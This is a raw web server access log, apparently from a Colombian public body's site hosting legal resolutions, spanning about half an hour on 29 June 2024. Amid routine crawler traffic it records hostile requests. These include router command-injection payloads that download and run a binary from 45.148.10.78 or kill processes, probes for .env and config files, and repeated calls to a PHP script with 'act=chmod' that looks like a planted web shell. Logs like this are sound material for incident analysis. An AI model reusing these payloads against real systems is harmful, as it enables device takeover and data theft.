201.245.192.253 - - [29/Jun/2024:02:53:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:53:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:02:54:23 -0500] "GET /PDC/actos/1731.pdf HTTP/1.1" 200 724138
66.249.66.12 - - [29/Jun/2024:02:54:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0998.pdf HTTP/1.1" 200 363349
172.22.2.4 - - [29/Jun/2024:02:54:43 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
201.245.192.253 - - [29/Jun/2024:02:54:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:02:55:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1418.pdf HTTP/1.1" 200 446793
201.245.192.253 - - [29/Jun/2024:02:55:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:55:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [29/Jun/2024:02:56:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:02:56:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [29/Jun/2024:02:56:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2936.pdf HTTP/1.1" 200 385764
201.245.192.253 - - [29/Jun/2024:02:56:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
65.109.109.110 - - [29/Jun/2024:02:57:07 -0500] "GET /Publicaciones/2023EE15874.pdf HTTP/1.1" 404 227
66.249.66.12 - - [29/Jun/2024:02:57:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000433.tif HTTP/1.1" 200 59198
201.245.192.253 - - [29/Jun/2024:02:57:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
176.9.137.113 - - [29/Jun/2024:02:57:56 -0500] "GET /Publicaciones/2023EE13445.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:02:57:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:02:56:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.12 - - [29/Jun/2024:02:58:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3453.pdf HTTP/1.1" 200 629748
66.249.66.11 - - [29/Jun/2024:02:58:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20151-200/2002RES189.tif HTTP/1.1" 200 61924
66.249.66.11 - - [29/Jun/2024:02:58:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1396.pdf HTTP/1.1" 200 3068261
172.22.2.4 - - [29/Jun/2024:02:57:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
201.245.192.253 - - [29/Jun/2024:02:58:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:02:59:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6040.pdf HTTP/1.1" 200 42310
66.249.66.13 - - [29/Jun/2024:02:59:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4098.pdf HTTP/1.1" 200 320175
94.16.31.222 - - [29/Jun/2024:02:59:55 -0500] "GET /Publicaciones/2023EE12521.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:02:59:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:59:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
207.46.13.111 - - [29/Jun/2024:03:00:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1294.pdf HTTP/1.1" 200 3919341
37.120.189.199 - - [29/Jun/2024:03:00:08 -0500] "GET /Publicaciones/2023EE12623.pdf HTTP/1.1" 404 227
52.167.144.216 - - [29/Jun/2024:03:00:31 -0500] "GET /BLA/resoluciones/AUTOS%202022/0274.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:03:00:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2373.pdf HTTP/1.1" 200 452864
201.245.192.253 - - [29/Jun/2024:03:00:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:03:01:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/2901.pdf HTTP/1.1" 200 444234
201.245.192.253 - - [29/Jun/2024:03:01:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:03:01:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0140.pdf HTTP/1.1" 200 439712
216.245.221.92 - - [29/Jun/2024:03:01:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:01:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:01:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
54.36.232.187 - - [29/Jun/2024:03:02:16 -0500] "GET /Publicaciones/2023EE18461.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:03:02:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20601-650/00000648.tif HTTP/1.1" 200 138398
47.128.18.211 - - [29/Jun/2024:03:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6494.pdf HTTP/1.1" 200 2714
66.249.66.12 - - [29/Jun/2024:03:02:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/4325.pdf HTTP/1.1" 200 360433
201.245.192.253 - - [29/Jun/2024:03:02:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:03:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20501-550/00000518.tif HTTP/1.1" 200 64022
47.128.18.214 - - [29/Jun/2024:03:03:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3884.pdf HTTP/1.1" 200 2714
47.128.119.196 - - [29/Jun/2024:03:03:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4262.pdf HTTP/1.1" 200 2739
66.249.66.12 - - [29/Jun/2024:03:03:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0494.pdf HTTP/1.1" 200 483316
66.249.66.11 - - [29/Jun/2024:03:03:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2304.pdf HTTP/1.1" 200 4328597
172.22.2.4 - - [29/Jun/2024:03:02:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.14 - - [29/Jun/2024:03:03:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5592.pdf HTTP/1.1" 200 346735
201.245.192.253 - - [29/Jun/2024:03:03:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:03:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
89.58.51.117 - - [29/Jun/2024:03:04:17 -0500] "GET /Publicaciones/2023EE12423.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:03:04:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5354.pdf HTTP/1.1" 200 379233
172.22.2.4 - - [29/Jun/2024:03:03:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [29/Jun/2024:03:04:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:03:05:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/1455.pdf HTTP/1.1" 200 423698
201.245.192.253 - - [29/Jun/2024:03:05:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:05:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:06:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0798.pdf HTTP/1.1" 200 373233
216.245.221.92 - - [29/Jun/2024:03:06:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:06:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:03:06:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
69.171.249.2 - - [29/Jun/2024:03:07:04 -0500] "GET / HTTP/1.1" 200 4720
69.171.249.7 - - [29/Jun/2024:03:07:04 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.13 - - [29/Jun/2024:03:07:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20501-550/00000536.tif HTTP/1.1" 200 154498
66.249.66.11 - - [29/Jun/2024:03:07:23 -0500] "GET /BLA/resoluciones/AUTOS%202024/02174.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:03:07:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5028.pdf HTTP/1.1" 200 568979
201.245.192.253 - - [29/Jun/2024:03:07:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:07:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:03:08:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2689.pdf HTTP/1.1" 200 395365
47.128.50.0 - - [29/Jun/2024:03:08:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3097.pdf HTTP/1.1" 200 2740
47.128.50.115 - - [29/Jun/2024:03:08:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3240.pdf HTTP/1.1" 200 2714
66.249.66.12 - - [29/Jun/2024:03:08:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201701-1750/20021725.tif HTTP/1.1" 200 476306
201.245.192.253 - - [29/Jun/2024:03:08:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.114.59 - - [29/Jun/2024:03:09:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=1877.PDF HTTP/1.1" 200 2741
47.128.50.112 - - [29/Jun/2024:03:09:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3941.pdf HTTP/1.1" 200 2714
66.249.66.13 - - [29/Jun/2024:03:09:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3742.pdf HTTP/1.1" 200 1641269
66.249.66.12 - - [29/Jun/2024:03:09:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0008.pdf HTTP/1.1" 200 342283
47.128.52.205 - - [29/Jun/2024:03:09:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3750.PDF HTTP/1.1" 200 2740
172.22.2.4 - - [29/Jun/2024:03:08:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:09:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.24.72 - - [29/Jun/2024:03:09:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6859.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:03:09:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.85 - - [29/Jun/2024:03:10:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3750.pdf HTTP/1.1" 200 2739
172.22.2.4 - - [29/Jun/2024:03:10:28 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 304 -
47.128.50.63 - - [29/Jun/2024:03:10:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3513.pdf HTTP/1.1" 200 2739
172.22.2.4 - - [29/Jun/2024:03:08:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.120.26 - - [29/Jun/2024:03:10:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2973.PDF HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:03:10:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.187 - - [29/Jun/2024:03:11:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3148.pdf HTTP/1.1" 200 2714
157.55.39.54 - - [29/Jun/2024:03:11:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0011.pdf HTTP/1.1" 200 341475
47.128.126.88 - - [29/Jun/2024:03:11:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2188.pdf HTTP/1.1" 200 2740
66.249.66.11 - - [29/Jun/2024:03:11:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1004.pdf HTTP/1.1" 200 480796
47.128.44.145 - - [29/Jun/2024:03:11:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=00741.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:03:11:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
37.120.189.199 - - [29/Jun/2024:03:11:48 -0500] "GET /Publicaciones/2023EE09584.pdf HTTP/1.1" 404 227
176.126.103.79 - - [29/Jun/2024:03:11:50 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [29/Jun/2024:03:11:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:11:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.51.17 - - [29/Jun/2024:03:11:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=04288.pdf HTTP/1.1" 200 2901
201.245.192.253 - - [29/Jun/2024:03:11:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:03:12:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201451-1500/20021481.tif HTTP/1.1" 200 376664
47.128.127.119 - - [29/Jun/2024:03:12:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=01108.pdf HTTP/1.1" 200 2741
45.148.10.174 - - [29/Jun/2024:03:12:16 -0500] "POST /cmd,/simZysh/register_main/setCookie HTTP/1.1" 404 1018
66.249.66.13 - - [29/Jun/2024:03:12:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3908.pdf HTTP/1.1" 200 550641
47.128.126.76 - - [29/Jun/2024:03:12:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2854.pdf HTTP/1.1" 200 2714
66.249.66.11 - - [29/Jun/2024:03:12:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201001-1050/2002RES1037.tif HTTP/1.1" 200 88758
47.128.61.228 - - [29/Jun/2024:03:12:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3099.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:03:12:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.181 - - [29/Jun/2024:03:13:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4607.pdf HTTP/1.1" 200 2709
47.128.62.162 - - [29/Jun/2024:03:13:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3563.pdf HTTP/1.1" 200 2740
66.249.66.12 - - [29/Jun/2024:03:13:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0229.pdf HTTP/1.1" 200 374229
66.249.66.13 - - [29/Jun/2024:03:13:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5426.pdf HTTP/1.1" 200 348962
47.128.61.247 - - [29/Jun/2024:03:13:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3315.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:03:13:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.62.144 - - [29/Jun/2024:03:13:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=6717.pdf HTTP/1.1" 200 2714
201.245.192.253 - - [29/Jun/2024:03:13:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:14:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3364.pdf HTTP/1.1" 200 434883
66.249.66.11 - - [29/Jun/2024:03:14:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/5872.pdf HTTP/1.1" 200 424758
201.245.192.253 - - [29/Jun/2024:03:14:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
135.181.92.72 - - [29/Jun/2024:03:15:01 -0500] "GET /Publicaciones/2023EE17413.pdf HTTP/1.1" 404 227
66.249.66.13 - - [29/Jun/2024:03:15:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3831.pdf HTTP/1.1" 200 362312
172.22.2.4 - - [29/Jun/2024:03:13:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
162.216.149.89 - - [29/Jun/2024:03:15:32 -0500] "GET / HTTP/1.1" 200 319
66.249.66.11 - - [29/Jun/2024:03:15:34 -0500] "GET /BLA/resoluciones/AUTOS%202024/01485.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:03:15:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:15:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:03:14:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
201.245.192.253 - - [29/Jun/2024:03:16:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [29/Jun/2024:03:16:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:03:16:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201451-1500/20021461.tif HTTP/1.1" 200 121602
201.245.192.253 - - [29/Jun/2024:03:16:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:03:17:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5987.pdf HTTP/1.1" 200 676602
201.245.192.253 - - [29/Jun/2024:03:17:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36528
201.245.192.253 - - [29/Jun/2024:03:17:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35233
66.249.66.13 - - [29/Jun/2024:03:17:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2206.pdf HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:03:17:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4480.pdf HTTP/1.1" 200 399501
66.249.66.13 - - [29/Jun/2024:03:17:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20351-400/00000377.tif HTTP/1.1" 200 57600
201.245.192.253 - - [29/Jun/2024:03:17:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:17:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:03:18:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0783.pdf HTTP/1.1" 200 338006
141.98.83.197 - - [29/Jun/2024:03:18:37 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [29/Jun/2024:03:18:37 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [29/Jun/2024:03:18:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:03:19:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4742.pdf HTTP/1.1" 200 430813
201.245.192.253 - - [29/Jun/2024:03:19:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:19:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:03:20:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35233
201.245.192.253 - - [29/Jun/2024:03:19:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35513
216.244.66.195 - - [29/Jun/2024:03:20:26 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.12 - - [29/Jun/2024:03:20:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2764.pdf HTTP/1.1" 200 334893
66.249.66.11 - - [29/Jun/2024:03:20:37 -0500] "GET /autoliquidacion/Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Solicitudes%20relacionadas%20a%20Programa%20de%20Autorregulaci%C3%B3n%20Ambiental/Formato%20de%20relaci%C3%B3n%20de%20vehiculos%20(autoregulaci%C3%B3n%20ambiental).pdf HTTP/1.1" 200 62192
176.9.137.113 - - [29/Jun/2024:03:20:39 -0500] "GET /Publicaciones/2023EE18787.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:03:20:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3938.pdf HTTP/1.1" 200 456737
201.245.192.253 - - [29/Jun/2024:03:20:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:03:20:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [29/Jun/2024:03:19:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.13 - - [29/Jun/2024:03:21:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2362.pdf HTTP/1.1" 200 416384
66.249.66.12 - - [29/Jun/2024:03:21:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/05538.pdf HTTP/1.1" 200 1843069
201.245.192.253 - - [29/Jun/2024:03:21:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [29/Jun/2024:03:21:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000408.tif HTTP/1.1" 200 58350
216.245.221.92 - - [29/Jun/2024:03:21:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:03:21:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:03:21:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.58.180 - - [29/Jun/2024:03:21:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5179.pdf HTTP/1.1" 200 2740
172.22.2.4 - - [29/Jun/2024:03:20:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51986
47.128.58.20 - - [29/Jun/2024:03:22:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3749.PDF HTTP/1.1" 200 2901
156.146.57.104 - - [29/Jun/2024:03:22:27 -0500] "GET /frontend_dev.php/$ HTTP/1.1" 404 1018
156.146.57.104 - - [29/Jun/2024:03:22:27 -0500] "GET /example.php HTTP/1.1" 404 1018
156.146.57.104 - - [29/Jun/2024:03:22:28 -0500] "GET /config.js HTTP/1.1" 404 1018
156.146.57.104 - - [29/Jun/2024:03:22:29 -0500] "GET /config.json HTTP/1.1" 404 1018
66.249.66.13 - - [29/Jun/2024:03:22:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201051-1100/00001074.tif HTTP/1.1" 200 330844
156.146.57.104 - - [29/Jun/2024:03:22:30 -0500] "GET /_profiler/phpinfo HTTP/1.1" 404 1018
66.249.66.11 - - [29/Jun/2024:03:22:30 -0500] "GET /resoluciones/RESOLUCIONES%202010/1690.pdf HTTP/1.1" 404 1018
156.146.57.104 - - [29/Jun/2024:03:22:31 -0500] "POST / HTTP/1.1" 200 319
156.146.57.104 - - [29/Jun/2024:03:22:33 -0500] "GET /.env HTTP/1.1" 404 1018
156.146.57.104 - - [29/Jun/2024:03:22:34 -0500] "POST / HTTP/1.1" 200 319
47.128.58.218 - - [29/Jun/2024:03:22:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=5150.pdf HTTP/1.1" 200 2715
156.146.57.104 - - [29/Jun/2024:03:22:34 -0500] "GET /laravel/.env HTTP/1.1" 404 1018
156.146.57.104 - - [29/Jun/2024:03:22:35 -0500] "POST / HTTP/1.1" 200 319
156.146.57.104 - - [29/Jun/2024:03:22:36 -0500] "GET /.env.save HTTP/1.1" 404 1018
156.146.57.104 - - [29/Jun/2024:03:22:37 -0500] "POST / HTTP/1.1" 200 319
156.146.57.104 - - [29/Jun/2024:03:22:38 -0500] "GET /.env.bak HTTP/1.1" 404 1018
156.146.57.104 - - [29/Jun/2024:03:22:40 -0500] "POST / HTTP/1.1" 200 319
